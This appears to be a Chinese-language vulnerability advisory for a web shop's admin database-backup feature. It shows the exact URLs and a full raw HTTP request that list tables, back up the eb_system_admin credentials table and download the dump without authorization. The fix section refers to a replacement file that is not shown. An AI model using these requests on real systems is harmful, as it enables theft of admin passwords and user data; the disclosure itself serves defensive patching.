问题:system.system_databackup功能处存在未授权获取数据库文件,泄露数据库敏感信息
| 查看表名 | http://192.168.8.75/admin/system.system_databackup/tablelist.html例如:eb_user表和eb_system_admin表保存账号和密码 |
| 备份eb_system_admin表 | POST /admin/system.system_databackup/backup HTTP/1.1Host: 192.168.8.75Content-Length: 28Accept: application/json, text/javascript, */*; q=0.01Dnt: 1X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedOrigin: http://192.168.8.75Referer: http://192.168.8.75/admin/system.system_databackup/index.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8 tables%5B%5D=eb_system_admin |
| 查看备份文件名称 | http://192.168.8.75/admin/system.system_databackup/filelist.html?page=1&limit=10 |
| 根据返回的“time”值下载数据库表备份文件 | http://192.168.8.75/admin/system.system_databackup/downloadFile/feilname/1704781013 |
修复方法:下载下面文件覆盖
文件上传到根目录;如图
解压文件夹即可
{{item.user_info.nickname ? item.user_info.nickname : item.user_name}}
作者 管理员 企业
{{itemf.name}}
{{itemc.user_info.nickname}}
{{itemc.user_name}}
回复 {{itemc.comment_user_info.nickname}}
![]()
{{itemf.name}}